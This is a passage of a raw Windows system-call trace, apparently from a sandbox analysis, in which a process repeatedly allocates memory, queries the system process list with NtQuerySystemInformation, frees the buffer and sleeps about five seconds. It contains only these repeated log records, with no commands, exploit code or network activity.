returned 0x0 [0223.444] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.445] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.446] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.446] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.447] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.447] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.447] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.452] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.453] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.454] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.454] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.455] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.455] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.455] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.460] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.461] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.463] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.463] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.464] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.464] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.464] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.467] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.468] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.469] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.469] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.470] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.470] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.470] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.474] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.475] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.476] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.476] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.477] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.477] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.477] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.481] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.482] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.484] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.484] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.484] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.484] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.485] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.488] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.489] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.490] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.490] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.491] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.491] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.491] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.495] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.495] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.497] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.497] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.497] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.498] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.498] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.501] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.502] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.504] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.504] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.504] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.505] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.505] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.508] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.509] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.511] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.511] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.511] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.512] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.512] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.515] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.516] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.519] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.519] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.520] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.521] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.521] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.527] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.528] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.529] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.529] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.530] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.530] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.531] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.534] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.535] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.537] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.537] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.538] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.538] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.538] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.542] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.542] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.544] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.544] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.545] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.545] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.545] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.549] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.549] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.551] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.551] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.551] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.552] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.552] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.555] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.556] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.557] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.557] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.558] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.558] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.558] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.563] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.564] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.566] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.570] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.571] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.571] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.571] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.575] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.576] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.578] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.578] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.579] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.579] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.579] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.583] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.583] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.585] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.585] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.586] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.586] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.586] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.590] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.590] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.592] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.593] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.593] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.594] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.594] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.598] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.599] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.601] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.601] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.602] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.602] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, 